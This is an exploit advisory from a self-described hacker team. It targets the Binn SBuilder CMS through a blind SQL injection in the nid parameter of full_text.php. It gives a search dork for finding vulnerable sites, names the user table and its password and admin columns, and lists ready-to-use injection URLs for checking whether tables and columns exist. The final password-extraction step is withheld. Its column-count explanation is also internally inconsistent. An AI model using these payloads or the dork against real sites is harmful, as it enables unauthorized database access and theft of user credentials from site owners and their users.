Binn SBuilder suffers from a remote blind SQL injection vulnerability.
--==+=================== Spanish Hackers Team ( =================+==--
--==+ Binn SBuilder (nid) Remote Blind Sql Injection Vulnerabily +==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Binn SBuilder
[~] HomePage:
[~] Exploit: Blind Sql Injection [High]
[~] Where: full_text.php?nid=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]
[~] Web:
[~] Dork: "Powered by CMS.GE"
[~] Dork2: priv8!
[+] Important tables and columns:
[*] Tables:
[~] Table: binn_users
[*] Columns:
[~] Column: bu_id
[~] Column 2: bu_login
[~] Column 3: bu_pass
[~] Column 4: bu_name
[~] Column 5: bu_admin
[~] Column 6: bu_last_ip
[~] Column 7: bu_last_date
[+] Compression:
[~] True: http://localhost/[path]/full_text.php?nid=[NUM] and 1=1
[~] False: http://localhost/[path]/full_text.php?nid=[NUM] and 1=2
[~] Example: http://localhost/[path]/full_text.php?nid=4855 and 1=1
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and 1=2
[~] If you see the Web correctly is true, if it is not false.
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/full_text.php?nid=[NUM] and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) >= 0
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and exists (select * from binn_users)
[~] If you don't see any error, it is that table exist.
[*] Checking columns number of table:
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) = 7
[~] If you don't see any error, the table has 6 columns.
[*] Checking columns of table:
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(bu_pass) FROM binn_users) >= 0
[~] If you don't see any error, the column exists.
[*] Admin Password; Noob or Lammer?:
[~] Exploit: Priv8
[~] Example: Priv8
[~] Priv8 , xD.
--==+=================== Spanish Hackers Team ( =================+==--
--==+ JosS +==--
[+] [The End]